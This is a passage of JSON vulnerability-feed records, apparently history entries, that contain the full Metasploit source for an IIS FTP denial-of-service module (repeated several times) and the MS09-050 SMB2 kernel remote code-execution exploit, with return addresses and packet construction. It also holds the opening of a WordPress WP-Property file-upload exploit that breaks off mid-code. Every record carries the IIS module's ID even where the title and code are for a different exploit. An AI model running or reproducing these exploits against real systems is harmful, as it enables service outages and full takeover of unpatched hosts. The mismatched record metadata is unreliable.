"Microsoft IIS FTP Server LIST Stack Exhaustion", "description": "This module triggers Denial of Service condition in the Microsoft Internet Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command containing a wildcard. For this exploit to work in most cases, you need 1) a valid ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must be configured as \"manual\" mode in startup type 3) there must be at least one directory under FTP root directory. If your provided an FTP account has write-access privilege and there is no single directory, a new directory with random name will be created prior to sending exploit payload.\n", "published": "2011-11-26T19:30:35", "modified": "2019-05-23T12:01:21", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:N/I:N/A:P"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2521", "http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html"], "cvelist": ["CVE-2009-2521"], "lastseen": "2019-07-13T18:24:55", "history": [], "viewCount": 121, "enchantments": {"score": {"value": 6.2, "vector": "NONE", "modified": "2019-07-13T18:24:55"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2009-2521"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:102750"]}, {"type": "seebug", "idList": ["SSV:12236", "SSV:12477"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310900944", "OPENVAS:900944", "OPENVAS:1361412562310900874", "OPENVAS:900874"]}, {"type": "exploitdb", "idList": ["EDB-ID:9587", "EDB-ID:17476"]}, {"type": "nessus", "idList": ["SMB_NT_MS09-053.NASL"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:22610"]}], "modified": "2019-07-13T18:24:55"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Dos\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Microsoft IIS FTP Server LIST Stack Exhaustion',\n 'Description' => %q{\n This module triggers Denial of Service condition in the Microsoft Internet\n Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command\n containing a wildcard. For this exploit to work in most cases, you need 1) a valid\n ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must\n be configured as \"manual\" mode in startup type 3) there must be at least one\n directory under FTP root directory. If your provided an FTP account has write-access\n privilege and there is no single directory, a new directory with random name will be\n created prior to sending exploit payload.\n },\n 'Author' =>\n [\n 'Kingcope', # Initial discovery\n 'Myo Soe' # Metasploit Module (http://yehg.net)\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2009-2521'],\n [ 'BID', '36273'],\n [ 'OSVDB', '57753'],\n [ 'MSB', 'MS09-053'],\n [ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html']\n ],\n 'DisclosureDate' => 'Sep 03 2009'))\n end\n\n def run\n # Attempt to crash IIS FTP\n begin\n return unless connect_login\n print_status('Checking if there is at least one directory ...')\n res = send_cmd_data(['ls'],'')\n\n if res.to_s =~ /\\<DIR\\> / then\n print_status('Directory found, skipped creating a directory')\n else\n print_status('No single directory found')\n print_status('Attempting to create a directory ...')\n new_dir = Rex::Text.rand_text_alphanumeric(6)\n res = send_cmd(['mkd',new_dir])\n if res =~ /directory created/ then\n print_status(\"New directory \\\"#{new_dir}\\\" was created!\")\n else\n print_error('Write-access was denied')\n print_error('Exploit failed')\n disconnect\n return\n end\n end\n\n print_status(\"Sending DoS packets ...\")\n res = send_cmd_datax(['ls','-R */../'],' ')\n disconnect\n rescue ::Interrupt\n raise $!\n rescue ::Rex::ConnectionRefused\n print_error(\"Cannot connect. The server is not running.\")\n return\n rescue Rex::ConnectionTimeout\n print_error(\"Cannot connect. The connection timed out.\")\n return\n rescue\n end\n\n #More careful way to check DOS\n print_status(\"Checking server's status...\")\n begin\n connect_login\n disconnect\n print_error(\"DOS attempt failed. The service is still running.\")\n rescue\n print_good(\"Success! Service is down\")\n end\n end\n\n # Workaround: modified send_cmd_data function with short sleep time before data_disconnect call\n # Bug Tracker: 4868\n def send_cmd_datax(args, data, mode = 'a', nsock = self.sock)\n args[0] = \"LIST\"\n # Set the transfer mode and connect to the remove server\n return nil if not data_connect(mode)\n # Our pending command should have got a connection now.\n res = send_cmd(args, true, nsock)\n # make sure could open port\n return nil unless res =~ /^(150|125) /\n # dispatch to the proper method\n begin\n data = self.datasocket.get_once(-1, ftp_timeout)\n rescue ::EOFError\n data = nil\n end\n select(nil,nil,nil,1)\n # close data channel so command channel updates\n data_disconnect\n # get status of transfer\n ret = nil\n ret = recv_ftp_resp(nsock)\n ret = [ ret, data ]\n ret\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-07-13T18:24:55", "differentElements": ["cvelist", "cvss", "description", "published", "references", "sourceData", "sourceHref", "title"], "edition": 77}, {"bulletin": {"id": "MSF:AUXILIARY/DOS/WINDOWS/FTP/IIS_LIST_EXHAUSTION", "hash": "2ebe361c7cde9c24289f12812ad4fabf", "type": "metasploit", "bulletinFamily": "exploit", "title": "MS09-050 Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference", "description": "This module exploits an out of bounds function table dereference in the SMB request validation code of the SRV2.SYS driver included with Windows Vista, Windows 7 release candidates (not RTM), and Windows 2008 Server prior to R2. Windows Vista without SP1 does not seem affected by this flaw.\n", "published": "2010-02-26T13:42:17", "modified": "2019-05-23T12:01:21", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103", "https://seclists.org/fulldisclosure/2009/Sep/0039.html"], "cvelist": ["CVE-2009-3103"], "lastseen": "2019-07-27T03:11:47", "history": [], "viewCount": 121, "enchantments": {"score": {"value": 9.2, "vector": "NONE", "modified": "2019-07-27T03:11:47"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2009-3103"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-CVE2009-3103.NSE"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:81723", "PACKETSTORM:86712"]}, {"type": "threatpost", "idList": ["THREATPOST:9C5AF36512145E9639AF7CB83F66B032", "THREATPOST:6B8C9E983349C1AA69D5488866DAAC1D"]}, {"type": "openvas", "idList": ["OPENVAS:801287", "OPENVAS:803571", "OPENVAS:100283", "OPENVAS:1361412562310100283", "OPENVAS:1361412562310104116", "OPENVAS:104116", "OPENVAS:1361412562310900965", "OPENVAS:1361412562310801287", "OPENVAS:1361412562310803571"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS09_050_SMB2_NEGOTIATE_FUNC_INDEX", "MSF:AUXILIARY/DOS/WINDOWS/SMB/MS09_050_SMB2_NEGOTIATE_PIDHIGH", "MSF:AUXILIARY/DOS/WINDOWS/SMB/MS09_050_SMB2_SESSION_LOGOFF"]}, {"type": "saint", "idList": ["SAINT:214C8A991DD5F17EF7735584268D3CB3", "SAINT:1E9A2A7C6228790D4846596C8DA04D49", "SAINT:30D79D30A079078FDE7DB3C5C56D3681"]}, {"type": "exploitdb", "idList": ["EDB-ID:12524", "EDB-ID:16363", "EDB-ID:9594", "EDB-ID:10005", "EDB-ID:14674", "EDB-ID:40280"]}, {"type": "seebug", "idList": ["SSV:12474"]}, {"type": "cert", "idList": ["VU:135940"]}, {"type": "canvas", "idList": ["SMB2_NEGOTIATE_LOCAL", "SMB2_NEGOTIATE_REMOTE"]}, {"type": "nessus", "idList": ["SMB2_PID_HIGH_VULN.NASL", "SMB_NT_MS09-050.NASL"]}, {"type": "zdt", "idList": ["1337DAY-ID-25384"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:22607"]}], "modified": "2019-07-27T03:11:47"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/smb/ms09_050_smb2_negotiate_func_index.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::SMB::Client\n include Msf::Exploit::KernelMode\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'MS09-050 Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference',\n 'Description' => %q{\n This module exploits an out of bounds function table dereference in the SMB\n request validation code of the SRV2.SYS driver included with Windows Vista, Windows 7\n release candidates (not RTM), and Windows 2008 Server prior to R2. Windows Vista\n without SP1 does not seem affected by this flaw.\n },\n\n 'Author' => [ 'Laurent Gaffie <laurent.gaffie[at]gmail.com>', 'hdm', 'sf' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'MSB', 'MS09-050' ],\n [ 'CVE', '2009-3103' ],\n [ 'BID', '36299' ],\n [ 'OSVDB', '57799' ],\n [ 'URL', 'https://seclists.org/fulldisclosure/2009/Sep/0039.html' ]\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'thread',\n },\n 'Privileged' => true,\n 'Payload' =>\n {\n 'Space' => 1024,\n 'StackAdjustment' => -3500,\n 'DisableNops' => true,\n 'EncoderType' => Msf::Encoder::Type::Raw,\n 'ExtendedOptions' =>\n {\n 'Stager' => 'stager_sysenter_hook',\n }\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Windows Vista SP1/SP2 and Server 2008 (x86)',\n {\n 'Platform' => 'win',\n 'Arch' => [ ARCH_X86 ],\n 'Ret' => 0xFFD00D09, # \"POP ESI; RET\" from the kernels HAL memory region ...no ASLR :)\n 'ReadAddress' => 0xFFDF0D04, # A readable address from kernel space (no nulls in address).\n 'ProcessIDHigh' => 0x0217, # srv2!SrvSnapShotScavengerTimer\n 'MagicIndex' => 0x3FFFFFB4, # (DWORD)( MagicIndex*4 + 0x130 ) == 0\n }\n ],\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Sep 07 2009'\n ))\n\n register_options(\n [\n Opt::RPORT(445),\n OptInt.new( 'WAIT', [ true, \"The number of seconds to wait for the attack to complete.\", 180 ] )\n ])\n end\n\n # Not reliable enough for automation yet\n def autofilter\n false\n end\n\n def exploit\n print_status( \"Connecting to the target (#{datastore['RHOST']}:#{datastore['RPORT']})...\" )\n connect\n\n # we use ReadAddress to avoid problems in srv2!SrvProcCompleteRequest\n # and srv2!SrvProcPartialCompleteCompoundedRequest\n dialects = [ [ target['ReadAddress'] ].pack(\"V\") * 25, \"SMB 2.002\" ]\n\n data = dialects.collect { |dialect| \"\\x02\" + dialect + \"\\x00\" }.join('')\n data += [ 0x00000000 ].pack(\"V\") * 37 # Must be NULL's\n data += [ 0xFFFFFFFF ].pack(\"V\") # Used in srv2!SrvConsumeDataAndComplete2+0x34 (known stability issue with srv2!SrvConsumeDataAndComplete2+6b)\n data += [ 0xFFFFFFFF ].pack(\"V\") # Used in srv2!SrvConsumeDataAndComplete2+0x34\n data += [ 0x42424242 ].pack(\"V\") * 7 # Unused\n data += [ target['MagicIndex'] ].pack(\"V\") # An index to force an increment the SMB header value :) (srv2!SrvConsumeDataAndComplete2+0x7E)\n data += [ 0x41414141 ].pack(\"V\") * 6 # Unused\n data += [ target.ret ].pack(\"V\") # EIP Control thanks to srv2!SrvProcCompleteRequest+0xD2\n data += payload.encoded # Our ring0 -> ring3 shellcode\n\n # We gain code execution by returning into the SMB packet, begining with its header.\n # The SMB packets Magic Header value is 0xFF534D42 which assembles to \"CALL DWORD PTR [EBX+0x4D]; INC EDX\"\n # This will cause an access violation if executed as we can never set EBX to a valid pointer.\n # To overcome this we force an increment of the header value (via MagicIndex), transforming it to 0x00544D42.\n # This assembles to \"ADD BYTE PTR [EBP+ECX*2+0x42], DL\" which is fine as ECX will be zero and EBP is a vaild pointer.\n # We patch the Signature1 value to be a jump forward into our shellcode.\n packet = Rex::Proto::SMB::Constants::SMB_NEG_PKT.make_struct\n packet['Payload']['SMB'].v['Command'] = Rex::Proto::SMB::Constants::SMB_COM_NEGOTIATE\n packet['Payload']['SMB'].v['Flags1'] = 0x18\n packet['Payload']['SMB'].v['Flags2'] = 0xC853\n packet['Payload']['SMB'].v['ProcessIDHigh'] = target['ProcessIDHigh']\n packet['Payload']['SMB'].v['Signature1'] = 0x0158E900 # \"JMP DWORD 0x15D\" ; jump into our ring0 payload.\n packet['Payload']['SMB'].v['Signature2'] = 0x00000000 # ...\n packet['Payload']['SMB'].v['MultiplexID'] = rand( 0x10000 )\n packet['Payload'].v['Payload'] = data\n\n packet = packet.to_s\n\n print_status( \"Sending the exploit packet (#{packet.length} bytes)...\" )\n sock.put( packet )\n\n\n wtime = datastore['WAIT'].to_i\n print_status( \"Waiting up to #{wtime} second#{wtime == 1 ? '' : 's'} for exploit to trigger...\" )\n stime = Time.now.to_i\n\n\n poke_logins = %W{Guest Administrator}\n poke_logins.each do |login|\n begin\n sec = connect(false)\n sec.login(datastore['SMBName'], login, rand_text_alpha(rand(8)+1), rand_text_alpha(rand(8)+1))\n rescue ::Exception => e\n sec.socket.close\n end\n end\n\n while( stime + wtime > Time.now.to_i )\n select(nil, nil, nil, 0.25)\n break if session_created?\n end\n\n handler\n disconnect\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-07-27T03:11:47", "differentElements": ["cvelist", "cvss", "description", "published", "references", "sourceData", "sourceHref", "title"], "edition": 78}, {"bulletin": {"id": "MSF:AUXILIARY/DOS/WINDOWS/FTP/IIS_LIST_EXHAUSTION", "hash": "1701ea7952a28f6b5c71b539ce24ebf2", "type": "metasploit", "bulletinFamily": "exploit", "title": "Microsoft IIS FTP Server LIST Stack Exhaustion", "description": "This module triggers Denial of Service condition in the Microsoft Internet Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command containing a wildcard. For this exploit to work in most cases, you need 1) a valid ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must be configured as \"manual\" mode in startup type 3) there must be at least one directory under FTP root directory. If your provided an FTP account has write-access privilege and there is no single directory, a new directory with random name will be created prior to sending exploit payload.\n", "published": "2011-11-26T19:30:35", "modified": "2019-05-23T12:01:21", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:N/I:N/A:P"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2521", "http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html"], "cvelist": ["CVE-2009-2521"], "lastseen": "2019-07-27T05:08:41", "history": [], "viewCount": 121, "enchantments": {"score": {"value": 6.2, "vector": "NONE", "modified": "2019-07-27T05:08:41"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2009-2521"]}, {"type": "seebug", "idList": ["SSV:12236", "SSV:12477"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:102750"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310900944", "OPENVAS:900944", "OPENVAS:1361412562310900874", "OPENVAS:900874"]}, {"type": "exploitdb", "idList": ["EDB-ID:9587", "EDB-ID:17476"]}, {"type": "nessus", "idList": ["SMB_NT_MS09-053.NASL"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:22610"]}], "modified": "2019-07-27T05:08:41"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Dos\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Microsoft IIS FTP Server LIST Stack Exhaustion',\n 'Description' => %q{\n This module triggers Denial of Service condition in the Microsoft Internet\n Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command\n containing a wildcard. For this exploit to work in most cases, you need 1) a valid\n ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must\n be configured as \"manual\" mode in startup type 3) there must be at least one\n directory under FTP root directory. If your provided an FTP account has write-access\n privilege and there is no single directory, a new directory with random name will be\n created prior to sending exploit payload.\n },\n 'Author' =>\n [\n 'Kingcope', # Initial discovery\n 'Myo Soe' # Metasploit Module (http://yehg.net)\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2009-2521'],\n [ 'BID', '36273'],\n [ 'OSVDB', '57753'],\n [ 'MSB', 'MS09-053'],\n [ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html']\n ],\n 'DisclosureDate' => 'Sep 03 2009'))\n end\n\n def run\n # Attempt to crash IIS FTP\n begin\n return unless connect_login\n print_status('Checking if there is at least one directory ...')\n res = send_cmd_data(['ls'],'')\n\n if res.to_s =~ /\\<DIR\\> / then\n print_status('Directory found, skipped creating a directory')\n else\n print_status('No single directory found')\n print_status('Attempting to create a directory ...')\n new_dir = Rex::Text.rand_text_alphanumeric(6)\n res = send_cmd(['mkd',new_dir])\n if res =~ /directory created/ then\n print_status(\"New directory \\\"#{new_dir}\\\" was created!\")\n else\n print_error('Write-access was denied')\n print_error('Exploit failed')\n disconnect\n return\n end\n end\n\n print_status(\"Sending DoS packets ...\")\n res = send_cmd_datax(['ls','-R */../'],' ')\n disconnect\n rescue ::Interrupt\n raise $!\n rescue ::Rex::ConnectionRefused\n print_error(\"Cannot connect. The server is not running.\")\n return\n rescue Rex::ConnectionTimeout\n print_error(\"Cannot connect. The connection timed out.\")\n return\n rescue\n end\n\n #More careful way to check DOS\n print_status(\"Checking server's status...\")\n begin\n connect_login\n disconnect\n print_error(\"DOS attempt failed. The service is still running.\")\n rescue\n print_good(\"Success! Service is down\")\n end\n end\n\n # Workaround: modified send_cmd_data function with short sleep time before data_disconnect call\n # Bug Tracker: 4868\n def send_cmd_datax(args, data, mode = 'a', nsock = self.sock)\n args[0] = \"LIST\"\n # Set the transfer mode and connect to the remove server\n return nil if not data_connect(mode)\n # Our pending command should have got a connection now.\n res = send_cmd(args, true, nsock)\n # make sure could open port\n return nil unless res =~ /^(150|125) /\n # dispatch to the proper method\n begin\n data = self.datasocket.get_once(-1, ftp_timeout)\n rescue ::EOFError\n data = nil\n end\n select(nil,nil,nil,1)\n # close data channel so command channel updates\n data_disconnect\n # get status of transfer\n ret = nil\n ret = recv_ftp_resp(nsock)\n ret = [ ret, data ]\n ret\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-07-27T05:08:41", "differentElements": ["sourceData"], "edition": 79}, {"bulletin": {"id": "MSF:AUXILIARY/DOS/WINDOWS/FTP/IIS_LIST_EXHAUSTION", "hash": "63880e80d9ab8ef7c9ba96cc0415c260", "type": "metasploit", "bulletinFamily": "exploit", "title": "Microsoft IIS FTP Server LIST Stack Exhaustion", "description": "This module triggers Denial of Service condition in the Microsoft Internet Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command containing a wildcard. For this exploit to work in most cases, you need 1) a valid ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must be configured as \"manual\" mode in startup type 3) there must be at least one directory under FTP root directory. If your provided an FTP account has write-access privilege and there is no single directory, a new directory with random name will be created prior to sending exploit payload.\n", "published": "2011-11-26T19:30:35", "modified": "2019-05-23T12:01:21", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:N/I:N/A:P"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2521", "http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html"], "cvelist": ["CVE-2009-2521"], "lastseen": "2019-07-27T23:03:24", "history": [], "viewCount": 121, "enchantments": {"score": {"value": 6.4, "vector": "NONE", "modified": "2019-07-27T23:03:24"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2009-2521"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310900944", "OPENVAS:900944", "OPENVAS:900874", "OPENVAS:1361412562310900874"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:102750"]}, {"type": "seebug", "idList": ["SSV:12236", "SSV:12477"]}, {"type": "exploitdb", "idList": ["EDB-ID:9587", "EDB-ID:17476"]}, {"type": "nessus", "idList": ["SMB_NT_MS09-053.NASL"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:22610"]}], "modified": "2019-07-27T23:03:24"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb", "sourceData": "", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-07-27T23:03:24", "differentElements": ["sourceData"], "edition": 80}, {"bulletin": {"id": "MSF:AUXILIARY/DOS/WINDOWS/FTP/IIS_LIST_EXHAUSTION", "hash": "1701ea7952a28f6b5c71b539ce24ebf2", "type": "metasploit", "bulletinFamily": "exploit", "title": "Microsoft IIS FTP Server LIST Stack Exhaustion", "description": "This module triggers Denial of Service condition in the Microsoft Internet Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command containing a wildcard. For this exploit to work in most cases, you need 1) a valid ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must be configured as \"manual\" mode in startup type 3) there must be at least one directory under FTP root directory. If your provided an FTP account has write-access privilege and there is no single directory, a new directory with random name will be created prior to sending exploit payload.\n", "published": "2011-11-26T19:30:35", "modified": "2019-05-23T12:01:21", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:N/I:N/A:P"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2521", "http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html"], "cvelist": ["CVE-2009-2521"], "lastseen": "2019-07-27T23:24:31", "history": [], "viewCount": 122, "enchantments": {"score": {"value": 6.2, "vector": "NONE", "modified": "2019-07-27T23:24:31"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2009-2521"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:102750"]}, {"type": "seebug", "idList": ["SSV:12236", "SSV:12477"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310900944", "OPENVAS:900944", "OPENVAS:900874", "OPENVAS:1361412562310900874"]}, {"type": "exploitdb", "idList": ["EDB-ID:9587", "EDB-ID:17476"]}, {"type": "nessus", "idList": ["SMB_NT_MS09-053.NASL"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:22610"]}], "modified": "2019-07-27T23:24:31"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Dos\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Microsoft IIS FTP Server LIST Stack Exhaustion',\n 'Description' => %q{\n This module triggers Denial of Service condition in the Microsoft Internet\n Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command\n containing a wildcard. For this exploit to work in most cases, you need 1) a valid\n ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must\n be configured as \"manual\" mode in startup type 3) there must be at least one\n directory under FTP root directory. If your provided an FTP account has write-access\n privilege and there is no single directory, a new directory with random name will be\n created prior to sending exploit payload.\n },\n 'Author' =>\n [\n 'Kingcope', # Initial discovery\n 'Myo Soe' # Metasploit Module (http://yehg.net)\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2009-2521'],\n [ 'BID', '36273'],\n [ 'OSVDB', '57753'],\n [ 'MSB', 'MS09-053'],\n [ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html']\n ],\n 'DisclosureDate' => 'Sep 03 2009'))\n end\n\n def run\n # Attempt to crash IIS FTP\n begin\n return unless connect_login\n print_status('Checking if there is at least one directory ...')\n res = send_cmd_data(['ls'],'')\n\n if res.to_s =~ /\\<DIR\\> / then\n print_status('Directory found, skipped creating a directory')\n else\n print_status('No single directory found')\n print_status('Attempting to create a directory ...')\n new_dir = Rex::Text.rand_text_alphanumeric(6)\n res = send_cmd(['mkd',new_dir])\n if res =~ /directory created/ then\n print_status(\"New directory \\\"#{new_dir}\\\" was created!\")\n else\n print_error('Write-access was denied')\n print_error('Exploit failed')\n disconnect\n return\n end\n end\n\n print_status(\"Sending DoS packets ...\")\n res = send_cmd_datax(['ls','-R */../'],' ')\n disconnect\n rescue ::Interrupt\n raise $!\n rescue ::Rex::ConnectionRefused\n print_error(\"Cannot connect. The server is not running.\")\n return\n rescue Rex::ConnectionTimeout\n print_error(\"Cannot connect. The connection timed out.\")\n return\n rescue\n end\n\n #More careful way to check DOS\n print_status(\"Checking server's status...\")\n begin\n connect_login\n disconnect\n print_error(\"DOS attempt failed. The service is still running.\")\n rescue\n print_good(\"Success! Service is down\")\n end\n end\n\n # Workaround: modified send_cmd_data function with short sleep time before data_disconnect call\n # Bug Tracker: 4868\n def send_cmd_datax(args, data, mode = 'a', nsock = self.sock)\n args[0] = \"LIST\"\n # Set the transfer mode and connect to the remove server\n return nil if not data_connect(mode)\n # Our pending command should have got a connection now.\n res = send_cmd(args, true, nsock)\n # make sure could open port\n return nil unless res =~ /^(150|125) /\n # dispatch to the proper method\n begin\n data = self.datasocket.get_once(-1, ftp_timeout)\n rescue ::EOFError\n data = nil\n end\n select(nil,nil,nil,1)\n # close data channel so command channel updates\n data_disconnect\n # get status of transfer\n ret = nil\n ret = recv_ftp_resp(nsock)\n ret = [ ret, data ]\n ret\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-07-27T23:24:31", "differentElements": ["cvelist", "cvss", "description", "modified", "published", "references", "sourceData", "sourceHref", "title"], "edition": 81}, {"bulletin": {"id": "MSF:AUXILIARY/DOS/WINDOWS/FTP/IIS_LIST_EXHAUSTION", "hash": "7bc1645b8d12cadec30355d6f6a578d7", "type": "metasploit", "bulletinFamily": "exploit", "title": "WordPress WP-Property PHP File Upload Vulnerability", "description": "This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress plugin. By abusing the uploadify.php file, a malicious user can upload a file to a temp directory without authentication, which results in arbitrary code execution.\n", "published": "2012-12-24T17:59:25", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html"], "cvelist": [], "lastseen": "2019-07-28T04:58:13", "history": [], "viewCount": 122, "enchantments": {"score": {"value": 4.2, "vector": "NONE", "modified": "2019-07-28T04:58:13"}, "dependencies": {"references": [{"type": "kitploit", "idList": ["KITPLOIT:8796837111710499727", "KITPLOIT:694607214883016670"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:153781", "PACKETSTORM:153771", "PACKETSTORM:153772", "PACKETSTORM:153766", "PACKETSTORM:153770"]}, {"type": "cve", "idList": ["CVE-2019-10267", "CVE-2019-13382", "CVE-2019-14277"]}, {"type": "thn", "idList": ["THN:5BC8F1A67A1CCC7511A6D85B8051C8F3"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:CE06C3F209F8E5D38C7580B181201F1E"]}, {"type": "talosblog", "idList": ["TALOSBLOG:D5D9A609E738B42AF70F4A0AAE59336E", "TALOSBLOG:BDEC9F3166490EE6F1F4DFE075BDD2D9"]}, {"type": "exploitdb", "idList": ["EDB-ID:47176", "EDB-ID:47177", "EDB-ID:47179", "EDB-ID:47181", "EDB-ID:47180"]}, {"type": "myhack58", "idList": ["MYHACK58:62201995234"]}], "modified": "2019-07-28T04:58:13"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/unix/webapp/wp_property_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HTTP::Wordpress\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(\n info,\n 'Name' => 'WordPress WP-Property PHP File Upload Vulnerability',\n 'Description' => %q(\n This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress\n plugin. By abusing the uploadify.php file, a malicious user can upload a file to a\n temp directory without authentication, which results in arbitrary code execution.\n ),\n 'Author' =>\n [\n 'Sammy FORGIT',\t# initial discovery\n 'James Fitts <fitts.james[at]gmail.com>' # metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['OSVDB', '82656'],\n ['BID', '53787'],\n ['EDB', '18987'],\n ['URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html'],\n ['WPVDB', '6225']\n ],\n 'Platform' => 'php',\n 'Arch'\t\t => ARCH_PHP,\n 'Targets' => [['wp-property <= 1.35.0', {}]],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Mar 26 2012'))\n end\n\n def check\n uri = normalize_uri(wordpress_url_plugins, 'wp-property', 'third-party', 'uploadify', 'uploadify.php')\n\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => uri\n 